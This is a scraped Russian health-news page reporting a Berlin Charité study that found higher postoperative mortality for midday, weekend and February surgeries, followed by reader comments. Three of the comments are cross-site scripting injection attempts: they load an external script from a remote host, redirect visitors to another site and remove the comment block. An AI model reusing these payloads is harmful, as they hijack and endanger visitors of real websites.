Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  В какой день нельзя идти ...  >>  В какой день нельзя идти в больницу!
 
Обратная связь
 

В какой день нельзя идти в больницу!

Размер шрифта
30 января 2015 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Недавнее исследование, представленное на Европейском Съезде Анестезиологов, показало, что полуденные часы, выходные и февраль – это те промежутки времени, в которые риск умереть после операции наиболее высок.

В какой день нельзя идти в больницу!

Смертность в стенах больницы – это показатель, который варьируется в зависимости от времени дня и ночи, в течение недели и от месяца к месяцу. Это было доказано во многих исследованиях, проведенных в различных уголках мира. Однако среди пациентов, только что перенесших оперативное вмешательство, данные о смертности не были отдельно изучены. В данной работе ученые стремились понять, меняется ли показатель смертности среди таких больных в течение дня, недели и в зависимости от времени года. Исследование было проведено доктором Феликсом Корком и профессором Клаудией Спайс из клиники Шарите в Берлине. 

В исследовании были проанализированы данные 218 758 пациентов, прооперированных в клинике Шарите с 2006 по 2011 год. Если операция была проведена в околополуденные часы, то риск смерти среди таких пациентов был выше на 21% по сравнению с прооперированными в другое время суток. В выходные этот риск был выше на 22% в сравнении с рабочими днями, а в феврале – выше на 16% по сравнению с остальными месяцами. Разумеется, необходимо дальнейшее изучение полученных данных, в том числе и поиск причин подобных изменений. 

«Есть несколько наиболее вероятных факторов, которые могли повлиять на уровень смертности. К примеру, уход за больными может отличаться в зависимости от времени суток и дня недели. Также существует вероятность того, что пациенты, которых оперировали в полуденное время и в выходные, имели более серьезные травмы и заболевания. Сейчас нам необходимы дополнительные данные, чтобы сделать окончательные выводы», – рассказывают авторы работы. «Несмотря на наличие единого стандарта ухода за больными и системы контроля качества, наше исследование показывает, что нужно продолжать искать методы, которые помогут улучшить качество оказания медицинской помощи», – добавляет доктор Корк.

Так что врачи и ученые работают вместе и делают все возможное, чтобы обезопасить пациента в стенах больницы.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - his shadow

30 января 2015 в 09:54

Цитировать   |   Пожаловаться

Сразу видно- человек ни разу не был в нашей больнице или поликлинике.
В принципе- туда вообще ходить не стоит, а в частности- идёшь тогда, когда добрая тётя тебе назначит, и другая добрая тётя, в регистратуре, даст номерок.

Да и операции делают не по желанию клиента.

2 - iravd61

01 февраля 2015 в 09:14

Цитировать   |   Пожаловаться

his shadow 30 января 2015 в 09:54
Сразу видно- человек ни разу не был в нашей больнице или поликлинике. В принципе- туда вообще ходить не стоит, а в частности- идёшь тогда, когда добрая тётя тебе назначит, и другая добрая тётя, в регистратуре, даст номерок. Да и операции делают не по желанию клиента.
 +1000!

3 - zzzzzz

30 июня 2015 в 18:26

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

4 - zzzzzz

30 июня 2015 в 21:24

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

5 - zzzzzz

30 июня 2015 в 22:20

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Московский музей «Живые системы» приглашает всех   Селфи убивает больше людей, чем акулы!   Вся правда о подтяжке   Проверьте прогноз погоды! От этого зависит, будет у вас инсульт или нет!  
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
Странные сигналы вашего организма
Как снова хотеть секса
Проблемы с внешностью или болезнь?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.